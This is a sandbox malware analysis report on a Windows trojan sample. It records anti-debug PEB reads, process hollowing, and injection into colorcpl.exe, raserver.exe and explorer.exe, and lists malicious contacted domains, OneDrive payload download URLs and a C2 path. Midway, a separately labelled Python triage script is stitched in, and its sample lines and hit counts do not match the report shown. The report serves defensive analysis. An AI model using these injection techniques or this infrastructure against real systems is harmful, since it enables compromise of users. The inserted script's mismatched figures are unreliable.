          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06ED49A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E951BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E1B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E4513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E19100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E596E0 NtFreeVirtualMemory,LdrInitializeThunk,

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\colorcpl.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 870000
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 10410000
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 4A80000
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 4FA0000
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 10410000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 4A80000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 4FA0000 protect: page execute and read and write
          Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 10410000 value starts with: 4D5A
          Source: C:\Windows\SysWOW64\colorcpl.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeThread register set: target process: 3324
          Source: C:\Users\user\Desktop\0321423605241625.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 4FA0000
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"
          Source: explorer.exe, 00000002.00000000.333633898.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.387636315.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.435849586.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.310463769.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.352140639.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.351540998.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.434029800.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.309952416.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: GetLocaleInfoA,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: GetLocaleInfoA,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02179438 GetLocalTime,
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217B938 GetVersionExA,
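Added example (not part of the Joe Sandbox report or of any Joe Sandbox tooling): a small Python triage script over the flattened signature lines of this section and of the anti-debug list that precedes it. In the extracted text the process path runs straight into the event name ("...colorcpl.exeCode function: ..."), so the script first splits each "Source:" line into process, event and detail. It then ranks the functions that read fs:[30h] (the PEB on 32-bit Windows, where the classic BeingDebugged/NtGlobalFlag checks begin) by hit count, and rebuilds the injection chain per target process: the RWX allocation in colorcpl.exe at 10410000 that receives a buffer starting with 4D5A ("MZ"), the thread started at the second RWX allocation (4FA0000), the section unmapped in raserver.exe (hollowing), and the executable section plus APC queued into explorer.exe. The embedded lines are a constructed subset of this report's own lines; the finding labels and the event list are this example's assumptions, not Joe Sandbox terminology.

```python
"""Triage helper for flattened Joe Sandbox 'Source: <process><event>: <detail>' lines.

Added example, not report or Joe Sandbox code.  It (1) ranks functions that
read the PEB via fs:[30h] and (2) rebuilds the cross-process injection chain,
flagging an RWX allocation that receives an 'MZ' buffer and is later used as
a thread start address, a section unmapped in a target (hollowing), an
executable section mapped into a target, and an APC queued into a target.
"""
import re
from collections import Counter, defaultdict

# Constructed sample: a subset of this report's lines, in the report's own format.
SAMPLE_REPORT = r"""
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E3A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E399BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E596E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\colorcpl.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 870000
Source: C:\Windows\SysWOW64\colorcpl.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 10410000
Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 4FA0000
Source: C:\Users\user\Desktop\0321423605241625.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 10410000 protect: page execute and read and write
Source: C:\Users\user\Desktop\0321423605241625.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 4FA0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\0321423605241625.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 10410000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\colorcpl.exeThread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\0321423605241625.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 4FA0000
"""

# Event names as they appear in the report (assumed list; extend as needed).
EVENTS = ("Code function", "Process queried", "Process created", "Memory allocated",
          "Memory written", "Thread created", "Thread APC queued",
          "Thread register set", "Section unmapped", "Section loaded")

# The process path and the event name are concatenated in the extracted text:
# split on the first '.exe' that is directly followed by a known event name.
LINE_RE = re.compile(r"^Source: (?P<src>.*?\.exe)(?P<event>" + "|".join(EVENTS) + r"): ?(?P<detail>.*)$")
PEB_RE = re.compile(r"^(?P<func>\S+) mov \w+, dword ptr fs:\[00000030h\]$")
ALLOC_RE = re.compile(r"^(?P<tgt>.*?\.exe) base: (?P<base>[0-9A-Fa-f]+) protect: (?P<prot>.+)$")
WRITE_RE = re.compile(r"^(?P<tgt>.*?\.exe) base: (?P<base>[0-9A-Fa-f]+)(?: value starts with: (?P<magic>[0-9A-Fa-f]+))?$")
THREAD_RE = re.compile(r"^(?P<tgt>.*?\.exe) EIP: (?P<eip>[0-9A-Fa-f]+)$")
UNMAP_RE = re.compile(r"^(?P<tgt>.*?\.exe) base address: [0-9A-Fa-f]+$")
SECTION_RE = re.compile(r"^unknown target: (?P<tgt>.*?\.exe) protection: (?P<prot>.+)$")
APC_RE = re.compile(r"^target process: (?P<tgt>.+)$")

# Finding labels (this example's own wording).
PE_IN_RWX = "PE image (MZ) written into an RWX allocation"
THREAD_IN_RWX = "remote thread started inside an injected RWX region"
HOLLOWED = "original image section unmapped (process hollowing)"
EXEC_SECTION = "executable section mapped into target"
APC_QUEUED = "APC queued in target thread"


def parse_report(text):
    """Return one dict per recognised line with keys src, event, detail."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            records.append(m.groupdict())
    return records


def peb_read_hotspots(records):
    """Functions reading fs:[30h] (the 32-bit PEB), most frequent first."""
    counts = Counter()
    for rec in records:
        if rec["event"] == "Code function":
            m = PEB_RE.match(rec["detail"])
            if m:
                counts[m["func"]] += 1
    return counts.most_common()


def _new_target():
    return {"injectors": set(), "regions": {}, "hollowed": False,
            "sections": [], "apc_queued": False, "thread_eips": []}


def injection_chain(records):
    """Group allocation/write/thread/section events by target process."""
    chain = defaultdict(_new_target)
    for rec in records:
        ev, detail, src = rec["event"], rec["detail"], rec["src"]
        if ev == "Memory allocated" and (m := ALLOC_RE.match(detail)):
            tgt = chain[m["tgt"]]
            region = tgt["regions"].setdefault(int(m["base"], 16), {"rwx": False, "mz": False})
            region["rwx"] = "execute" in m["prot"] and "write" in m["prot"]
        elif ev == "Memory written" and (m := WRITE_RE.match(detail)):
            tgt = chain[m["tgt"]]
            region = tgt["regions"].setdefault(int(m["base"], 16), {"rwx": False, "mz": False})
            if (m["magic"] or "").upper().startswith("4D5A"):   # 'MZ' DOS header
                region["mz"] = True
        elif ev == "Thread created" and (m := THREAD_RE.match(detail)):
            tgt = chain[m["tgt"]]
            tgt["thread_eips"].append(int(m["eip"], 16))
        elif ev == "Section unmapped" and (m := UNMAP_RE.match(detail)):
            tgt = chain[m["tgt"]]
            tgt["hollowed"] = True
        elif ev == "Section loaded" and (m := SECTION_RE.match(detail)):
            tgt = chain[m["tgt"]]
            tgt["sections"].append(m["prot"])
        elif ev == "Thread APC queued" and (m := APC_RE.match(detail)):
            tgt = chain[m["tgt"]]
            tgt["apc_queued"] = True
        else:
            continue
        tgt["injectors"].add(src)
    return dict(chain)


def classify(target):
    """Map one target's events to the injection findings they support."""
    findings = []
    regions = target["regions"]
    if any(r["rwx"] and r["mz"] for r in regions.values()):
        findings.append(PE_IN_RWX)
    if any(regions.get(eip, {}).get("rwx") for eip in target["thread_eips"]):
        findings.append(THREAD_IN_RWX)
    if target["hollowed"]:
        findings.append(HOLLOWED)
    if any("execute" in p for p in target["sections"]):
        findings.append(EXEC_SECTION)
    if target["apc_queued"]:
        findings.append(APC_QUEUED)
    return findings


def triage(text):
    """Return (peb_hotspots, {target: (sorted injectors, findings)})."""
    records = parse_report(text)
    chain = injection_chain(records)
    verdicts = {t: (sorted(v["injectors"]), classify(v)) for t, v in chain.items()}
    return peb_read_hotspots(records), verdicts


if __name__ == "__main__":
    hotspots, verdicts = triage(SAMPLE_REPORT)
    for func, n in hotspots:
        print(f"{func}: {n} PEB read(s)")
    for target, (injectors, findings) in verdicts.items():
        print(f"{target} <- {', '.join(injectors)}")
        for f in findings:
            print(f"    {f}")
```

Run as a script it prints the PEB hot spots and the per-target findings. Pasting the rest of this section's lines into SAMPLE_REPORT gives the full counts (14 reads in 1_2_06E3A309, 12 in 1_2_06E399BF); the "Thread register set: target process: 3324" line is parsed but not used, because it names a PID rather than a path.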

          Stealing of Sensitive Information

          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.colorcpl.exe.10410000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.colorcpl.exe.10410000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.553690913.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553760643.0000000002D80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305700476.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.305400692.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306413915.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.306024723.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.396763474.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.474871458.000000000E3BF000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (numbers in parentheses are the matched signatures per technique; techniques without a number were not observed for this sample)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Native API (1); Shared Modules (1); At (Linux); At (Windows); Cron; Launchd; Scheduled Task
Persistence: Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Privilege Escalation: Process Injection (812); Registry Run Keys / Startup Folder (1); DLL Side-Loading (1); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items
Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (1); Process Injection (812); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Software Packing (1); DLL Side-Loading (1)
Credential Access: Input Capture (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery (1); Security Software Discovery (221); Virtualization/Sandbox Evasion (1); Process Discovery (3); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (114)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Input Capture (1); Archive Collected Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Impact: Modify System Partition; Device Lockout; Delete Device Data; Data Encrypted for Impact
Behavior Graph ID: 756155 / Sample: 0321423605241625.exe / Start date: 29/11/2022 / Architecture: WINDOWS / Score: 100

Graph root: contacted www.thecuratedpour.com, www.segurofunerarioar.com and 7 other IPs or domains; signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures

0321423605241625.exe (started)
    network: l-0003.l-dc-msedge.net 13.107.43.12, 443, 49708, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States; ppqfqw.ph.files.1drv.com; 2 other IPs or domains
    dropped: C:\Users\Public\Libraries\Mwqrxeuz.exe (PE32); C:\Users\...\Mwqrxeuz.exe:Zone.Identifier (ASCII)
    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
    colorcpl.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
        explorer.exe (injected)
            Mwqrxeuz.exe (started)
                signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
                colorcpl.exe (started)
            raserver.exe (started)
                signatures: Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                cmd.exe (started)
                    conhost.exe (started)

Initial sample
Source | Detection | Scanner | Label
0321423605241625.exe | 36% | ReversingLabs | Win32.Trojan.Generic
0321423605241625.exe | 41% | Virustotal |
0321423605241625.exe | 100% | Avira | HEUR/AGEN.1214697
0321423605241625.exe | 100% | Joe Sandbox ML |

Dropped files
Source | Detection | Scanner | Label
C:\Users\Public\Libraries\Mwqrxeuz.exe | 100% | Avira | HEUR/AGEN.1214697
C:\Users\Public\Libraries\Mwqrxeuz.exe | 100% | Joe Sandbox ML |
C:\Users\Public\Libraries\Mwqrxeuz.exe | 36% | ReversingLabs | Win32.Trojan.Generic

Unpacked PE files
Source | Detection | Scanner | Label
1.0.colorcpl.exe.10410000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.0.0321423605241625.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1214697
0.2.0321423605241625.exe.2170000.0.unpack | 100% | Avira | TR/Hijacker.Gen
1.0.colorcpl.exe.10410000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.2.raserver.exe.525796c.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
1.0.colorcpl.exe.10410000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.colorcpl.exe.10410000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
9.2.raserver.exe.a3cda0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen8
0.2.0321423605241625.exe.3baeed8.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
3.2.Mwqrxeuz.exe.2598248.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.colorcpl.exe.10410000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.2.0321423605241625.exe.2231218.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.0321423605241625.exe.2278248.2.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
www.rematedeldia.com/euv4/ | 100% | Avira URL Cloud | malware
Contacted domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.kuechenpruefer.com | 217.160.0.95 | true | true | | unknown
librairie-adrienne.com | 192.0.78.141 | true | true | | unknown
l-0003.l-dc-msedge.net | 13.107.43.12 | true | false | | unknown
www.customapronsnow.com | 52.85.92.84 | true | true | | unknown
shops.myshopify.com | 23.227.38.74 | true | false | | unknown
www.thecuratedpour.com | unknown | unknown | true | | unknown
onedrive.live.com | unknown | unknown | false | | high
www.segurofunerarioar.com | unknown | unknown | true | | unknown
www.librairie-adrienne.com | unknown | unknown | true | | unknown
ppqfqw.ph.files.1drv.com | unknown | unknown | false | | high
www.rematedeldia.com | unknown | unknown | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
www.rematedeldia.com/euv4/ | true | Avira URL Cloud: malware | low
https://onedrive.live.com/download?cid=E0CF7F9E6AAF27EF&resid=E0CF7F9E6AAF27EF%21846&authkey=AOLP5PRESPN2npo | false | | high
https://ppqfqw.ph.files.1drv.com/y4mCDNCh3rnIYpJlqIqXCF9hAcHbqZ_4sWcNl3-omCYoNehN1gOwskkZvXxiCnSz1O3rlGujQmh2dpM-9vT8IEOnYjevggDBPg3L6krVTX5rpZ6Y9fWqq7mXN8HP0HSdlr6-fMy35G8DvzJqxvSasnXVIJpB-5dNG-tdgdNk_U_XYoTZ1ccJrC1sgInwIFqmsOi4T1bkt9-CIDRF_pvQqcEQA/Mwqrxeuzvim?download&psid=1 | false | | high
URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
